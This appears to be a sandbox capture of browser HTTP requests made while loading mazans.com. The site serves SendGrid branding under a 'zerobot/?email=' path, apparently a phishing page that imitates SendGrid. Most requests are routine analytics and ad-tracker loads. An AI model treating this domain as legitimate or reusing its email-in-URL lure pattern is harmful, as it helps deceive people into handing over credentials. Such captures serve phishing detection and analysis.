    Source: global trafficHTTP traffic detected: GET /notice?domain=sendgrid.com&c=teconsent&gtm=1&js=nj&noticeType=bb HTTP/1.1Host: consent.trustarc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sxp/i/c6a47dab391ea1c8a8b2709f8479395d.js HTTP/1.1Host: euob.powerrobotflower.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/settings HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mazans.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /analytics.js/v1/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/analytics.min.js HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /content/dam/sendgrid/core-assets/social/site.webmanifest HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /getuidj HTTP/1.1Host: secure.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mazans.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /asset/notice.js/v/v1.7-776 HTTP/1.1Host: consent.trustarc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://mazans.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /log?domain=sendgrid.com&country=us&state=&behavior=implied&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&c=a562&referer=https://mazans.com&language=en HTTP/1.1Host: consent.trustarc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notice?domain=sendgrid.com&c=teconsent&gtm=1&js=nj&noticeType=bb HTTP/1.1Host: consent.trustarc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbds.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/heap-1541905715.js HTTP/1.1Host: cdn.heapanalytics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/45414/inlinks.js HTTP/1.1Host: jscloud.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /log?domain=sendgrid.com&country=us&state=&behavior=implied&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&c=a562&referer=https://mazans.com&language=en HTTP/1.1Host: consent.trustarc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /aquant.js?a=p-de_F6qVUp9bug HTTP/1.1Host: secure.quantserve.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/settings HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /getuidj HTTP/1.1Host: secure.adnxs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /get?name=Whitney-Book.otf HTTP/1.1Host: consent.trustarc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://mazans.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /asset/notice.js/v/v1.7-776 HTTP/1.1Host: consent.trustarc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/45414/httpsmazanscomWEBID6672849687924zerobotemailEMAIL_REDACTED.json HTTP/1.1Host: jscloud.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mazans.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_i1au5p4_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mazans.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pixels/t2_i1au5p4/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mazans.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sxp/i/c6a47dab391ea1c8a8b2709f8479395d.js HTTP/1.1Host: euob.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/45414/inlinks.js HTTP/1.1Host: jscloud.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /asset/twilio2.png HTTP/1.1Host: consent.trustarc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1731515353679&id=t2_i1au5p4&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=59612d52-27d8-4d62-91ae-7a523b33ca67&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ct?id=72967&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&sf=0&tpi=&ch=SendGrid&uvid=&tsf=0&tsfmi=&tsfu=&cb=1731515352667&hl=1&op=0&ag=300509663&rand=53607585128791107956101156266160898169065292290902265118522000152187107289761818102920&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=https%3A%2F%2Fsepedatua.com%2F&ss=1280x1024&nc=0&at=&di=W1siZWYiLDM4ODhdLFsiYWJuY2giLDE3XSxbLTI0LCJbXSJdLFstMjgsImVuLVVTLGVuIl0sWy0zNCwiLSJdLFstNDYsIjAiXSxbLTQ4LCIwLDAiXSxbMTIsIntcImN0eFwiOlwid2ViZ2xcIixcInZcIjpcImdvb2dsZSBpbmMuIChnb29nbGUpXCIsXCJyXCI6XCJhbmdsZSAoZ29vZ2xlLCB2dWxrYW4gMS4zLjAgKHN3aWZ0c2hhZGVyIGRldmljZSAoc3ViemVybykgKDB4MDAwMGMwZGUpKSwgc3dpZnRzaGFkZXIgZHJpdmVyKVwiLFwic2x2XCI6XCJ3ZWJnbCBnbHNsIGVzIDEuMCAob3BlbmdsIGVzIGdsc2wgZXMgMS4wIGNocm9taXVtKVwiLFwiZ3ZlclwiOlwid2ViZ2wgMS4wIChvcGVuZ2wgZXMgMi4wIGNocm9taXVtKVwiLFwiZ3ZlblwiOlwid2Via2l0XCIsXCJiZW5cIjo3LFwid2dsXCI6MSxcImdyZW5cIjpcIndlYmtpdCB3ZWJnbFwiLFwic2VmXCI6MzY5ODUxODcxMCxcInNlY1wiOlwiXCJ9Il0sWy00LCItIl0sWy0zNSwiWzE3MzE1MTUzNTI0MDksNV0iXSxbLTQzLCIwMDAwMDAwMTAxMDAwMDAxMTAxMTEwMTEwMTEwMTEwMTAwMDAwMTAiXSxbLTUzLCIxMDAiXSxbLTU4LCItIl0sWy05LCIrIl0sWy0xOSwiWzAsMCwwLDAsMCwwLDEsMjQsMjQsXCItXCIsMTI4MCw5ODQsMTI4MCwxMDI0LDEyODAsOTg0LDEyODAsOTA3LDAsMCwwLDAsXCItXCIsXCItXCIsMTI2Myw5MDddIl0sWy0yNSwiLSJdLFstNTUsIjEiXSxbLTYwLDIwMV0sWy02MSwie1wid2dzbFwiOlwiMDtcIixcInBjZlwiOlwiYmdyYTh1bm9ybVwifSJdLFstNjYsImdlb2xvY2F0aW9uLHN0b3JhZ2VhY2Nlc3MsZ2FtZXBhZCxjaGVjdCxtaWRpLGRpc3BsYXljYXB0dXJlLHVzYixicm93c2luZ3RvcGljcyxsb2NhbGZvbnRzLHBpY3R1cmVpbnBpY3R1cmUsam9pbmFkaW50ZXJlc3Rncm91cCxwdWJsaWNrZXljcmVkZW50aWFsc2dldCxvdHBjcmVkZW50aWFscyxjaHVhZm9ybWZhY3RvcixlbmNyeXB0ZWRtZWRpYSxjaHNhdmVkYXRhLGNodWFmdWxsdmVyc2lvbmxpc3QsY2h1YXdvdzY0LHNoYXJlZHN0b3JhZ2UsY2hkb3dubGluayxjaHByZWZlcnNjb2xvcnNjaGVtZSxzeW5jeGhyLGNodWFtb2RlbCxzZXJpYWwsY2FtZXJhLGNocHJlZmVyc3JlZHVjZWRtb3Rpb24scHJpdmF0ZXN0YXRldG9rZW5pc3N1YW5jZSxibHVldG9vdGgsaWRlbnRpdHljcmVkZW50aWFsc2dldCxjaHVhZnVsbHZlcnNpb24sZnVsbHNjcmVlbixjaGRwcix1bmxvYWQsa2V5Ym9hcmRtYXAsY2h1YXBsYXRmb3JtLHNoYXJlZHN0b3JhZ2VzZWxlY3R1cmwsZ3lyb3Njb3BlLGludGVyZXN0Y29ob3J0LHdpbmRvd3BsYWNlbWVudCxjaHVhbW9iaWxlLGNodWEscnVuYWRhdWN0aW9uLG1hZ25ldG9tZXRlcixhY2NlbGVyb21ldGVyLHByaXZhdGVzdGF0ZXRva2VucmVkZW1wdGlvbixjaHVhYXJjaCx4cnNwYXRpYWx0cmFja2luZyxpZGxlZGV0ZWN0aW9uLGNodWFwbGF0Zm9ybXZlcnNpb24sY2h3aWR0aCxjbGlwYm9hcmRyZWFkLGNodmlld3BvcnR3aWR0aCxwYXltZW50LGNodmlld3BvcnRoZWlnaHQsY2hydHQsYXV0b3BsYXksY3Jvc3NvcmlnaW5pc29sYXRlZCxoaWQsY2h1YWJpdG5lc3Msc2NyZWVud2FrZWxvY2sscHJpdmF0ZWFnZ3JlZ2F0aW9uLGNsaXBib2FyZHdyaXRlLGF0dHJpYnV0aW9ucmVwb3J0aW5nLGNoZGV2aWNlbWVtb3J5LG1pY3JvcGhvbmUiXSxbLTcxLCJhMDEwMDEwMTEwMDEwMDEwMTAwMDEwMTAwMTExMTEwMDAwMDAxMCJdLFstMywiW1wiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiXSJdLFstMzksIltcIjIwMDMwMTA3XCIsMixcIkdlY2tvXCIsXCJOZXRzY2FwZVwiLFwiTW96aWxsYVwiLG51bGwsbnVsbCx0cnVlLDgsZmFsc2UsbnVsbCw1LHRydWUsdHJ1ZSxudWxsLDAsdHJ1ZSx0cnVlXSJdLFstNjMsIi0iXSxbLTcwLCItIl0
    Source: global trafficHTTP traffic detected: GET /bannermsg?action=views&domain=sendgrid.com&behavior=implied&country=us&language=en&rand=0.21308546817366736&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&referer=https://mazans.com HTTP/1.1Host: consent.trustarc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p/action/5202129.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/heap-1541905715.js HTTP/1.1Host: cdn.heapanalytics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /td/rul/923239173?random=1731515353497&cv=11&fst=1731515353497&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
